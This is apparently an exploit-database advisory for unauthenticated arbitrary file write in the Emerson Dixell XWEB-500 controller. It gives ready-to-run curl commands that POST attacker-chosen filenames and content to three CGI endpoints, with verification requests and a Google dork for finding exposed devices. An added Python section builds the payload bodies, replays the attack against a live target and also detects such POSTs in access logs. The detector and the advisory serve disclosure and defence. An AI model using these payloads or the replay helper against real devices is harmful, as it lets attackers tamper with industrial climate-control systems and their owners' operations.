Dixell XWEB 500 Arbitrary File Write

2022.01.05
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
# Google Dork: inurl:"xweb500.cgi"
# Date: 03/01/2022
# Exploit Author: Roberto Palamaro
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
# Version: XWEB-500
# Tested on: Dixell XWEB-500
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/

# Emerson Dixell XWEB-500 is affected by multiple arbitrary file write vulnerabilities.
# Each PoC below sends an unauthenticated POST whose body is a two-line text:
# the first line is the filename and the second line is the content of the file to be written.
# All three requests use "application/octet-stream" and the body is passed to curl
# verbatim via --data-binary @- (stdin). Note: "echo -e" is a bash/zsh feature; under
# a strict POSIX sh use printf 'file.extension\ncontent' instead.

# Endpoint: logo_extra_upload.cgi
# Write file
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Verify: the written file should appear in the /logo/ listing
curl -A Chrome -is "http://[target]:[port]/logo/"

# Endpoint: lo_utils.cgi
# Here the first line ACTION=5 enables write mode; filename and content follow on the next two lines
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Verify: ACTION=3 lists the resources
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Endpoint: cal_save.cgi
# Again the first line is the filename and the second line is the content of the file to be written
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Verify: cal_dir.cgi lists the saved files
curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_dir.cgi"
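The following is an added example, not part of the original advisory or Roberto Palamaro's PoC. It does two things a practitioner wants around the three endpoints above: build_body() constructs the exact POST body each curl line sends (with the ACTION=5 prefix for lo_utils.cgi) so a payload can be inspected before it goes out, and find_file_write_attempts() is a detector that runs over web-server access log lines and flags POSTs to the three CGI endpoints. The send() helper only reproduces the curl request with the standard library and needs a live target; everything else runs offline. The log format (Apache/nginx "combined"), the sample log lines and the addresses in them are constructed here for illustration.

```python
"""Added example for the Dixell XWEB-500 arbitrary file write advisory.

Not the advisory's or the author's code. SAMPLE_LOG and every address in
it are constructed; the log format is assumed to be Apache/nginx combined.
"""
import re
import urllib.request
from typing import Iterable

# The three CGI endpoints named in the advisory and the body prefix each expects.
# lo_utils.cgi needs "ACTION=5" on the first line to enter write mode.
FILE_WRITE_ENDPOINTS = {
    "/cgi-bin/logo_extra_upload.cgi": b"",
    "/cgi-bin/lo_utils.cgi": b"ACTION=5\n",
    "/cgi-bin/cal_save.cgi": b"",
}


def build_body(endpoint: str, filename: str, content: bytes) -> bytes:
    """Return the POST body the PoC sends: optional ACTION line, then the
    filename on one line, then the file content on the next."""
    if endpoint not in FILE_WRITE_ENDPOINTS:
        raise ValueError(f"unknown endpoint: {endpoint}")
    if "\n" in filename or "\r" in filename:
        # A newline in the filename would be parsed as the start of the content.
        raise ValueError("filename must be a single line")
    return FILE_WRITE_ENDPOINTS[endpoint] + filename.encode() + b"\n" + content


def send(base_url: str, endpoint: str, filename: str, content: bytes) -> int:
    """Replay the PoC's curl line (User-Agent Chrome, octet-stream body).
    Requires network access to a target; returns the HTTP status code."""
    req = urllib.request.Request(
        base_url.rstrip("/") + endpoint,
        data=build_body(endpoint, filename, content),
        method="POST",
        headers={"User-Agent": "Chrome", "Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


# Apache/nginx combined format (assumed):
# ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def find_file_write_attempts(lines: Iterable[str]) -> list:
    """Flag every POST to one of the three file-write endpoints.

    The access log does not carry the request body, so a lo_utils.cgi
    listing (ACTION=3) is flagged just like a write (ACTION=5); body-aware
    inspection (WAF, reverse proxy) is needed to separate the two."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if m.group("method") == "POST" and path in FILE_WRITE_ENDPOINTS:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "endpoint": path,
                "status": int(m.group("status")),
            })
    return hits


# Constructed sample log: three write attempts, two verification GETs and one
# unrelated POST that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jan/2022:10:14:02 +0100] "POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1" 200 12 "-" "Chrome"',
    '203.0.113.7 - - [03/Jan/2022:10:14:03 +0100] "GET /logo/ HTTP/1.1" 200 845 "-" "Chrome"',
    '203.0.113.7 - - [03/Jan/2022:10:15:10 +0100] "POST /cgi-bin/lo_utils.cgi HTTP/1.1" 200 4 "-" "Chrome"',
    '198.51.100.4 - - [03/Jan/2022:10:20:00 +0100] "GET /cgi-bin/cal_dir.cgi HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [03/Jan/2022:10:20:05 +0100] "POST /cgi-bin/cal_save.cgi?x=1 HTTP/1.1" 200 3 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [03/Jan/2022:10:21:00 +0100] "POST /cgi-bin/xweb500.cgi HTTP/1.1" 200 2000 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    print(build_body("/cgi-bin/lo_utils.cgi", "file.txt", b"content"))
    for hit in find_file_write_attempts(SAMPLE_LOG):
        print(hit)
```

Running the block flags the three POSTs (logo_extra_upload.cgi, lo_utils.cgi and cal_save.cgi) and leaves the GET verification steps and the unrelated xweb500.cgi POST alone. Because an access log never shows the body, the detector cannot tell a lo_utils.cgi write from a listing; treat any POST to these endpoints from an unexpected source as worth a look, and put body-aware filtering in front of the device if it must stay reachable.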


Copyright 2022, cxsecurity.com